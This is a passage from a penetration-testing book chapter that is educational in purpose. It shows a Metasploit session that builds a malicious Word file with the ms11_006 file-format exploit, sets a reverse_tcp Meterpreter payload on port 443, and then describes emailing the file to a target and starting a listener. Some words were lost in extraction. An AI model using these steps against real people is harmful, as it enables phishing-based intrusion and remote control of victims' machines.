background image


Chapter 8

available. In the next example, you can see that the file format is exported as 
a document:

msf > 

use windows/fileformat/ms11_006_createsizeddibsection

msf exploit(ms11_006_createsizeddibsection) > 


. . . SNIP . . .

Available targets:
  Id  Name
  --  ----
  0   Automatic
  1   Windows 2000 SP0/SP4 English
  2   Windows XP SP3 English
  3   Crash Target for Debugging

Next, you can see that we have a few targets available to use, but we’ll 

make it automatic and leave everything at the default settings:

Basic options:
  Name        Current Setting                      Required  Description
  ----        ---------------                      --------  -----------
  FILENAME    msf.doc                              yes       The file name.
  OUTPUTPATH  /opt/metasploit3/msf3/data/exploits  yes       The location of the file.

We’ll need to set a payload as usual. In this case, we will select our first 

choice, a reverse Meterpreter shell:

msf exploit(ms11_006_createsizeddibsection) > 

set payload



payload => windows/meterpreter/reverse_tcp
msf exploit(ms11_006_createsizeddibsection) > 


smsf exploit(ms11_006_createsizeddibsection) > 

set LPORT 443

LPORT => 443
msf exploit(ms11_006_createsizeddibsection) > 


[*] Creating 'msf.doc' file...
[*] Generated output file /opt/metasploit3/msf3/data/exploits/msf.doc
msf exploit(ms11_006_createsizeddibsection) >

Sending the Payload

Our file was exported as 


   and sent to the 


   directory within 

Metasploit. Now that we have our malicious document, we can craft up an 
email to our target and hope the user opens it. At this point, we should 
already have an idea of the target’s patch levels and vulnerabilities. Before 
we actually open the document, we need to set up a multi-handler listener. 
This will ensure that when the exploit is triggered, the attacker machine can 
receive the connection back from the target machine (reverse payload).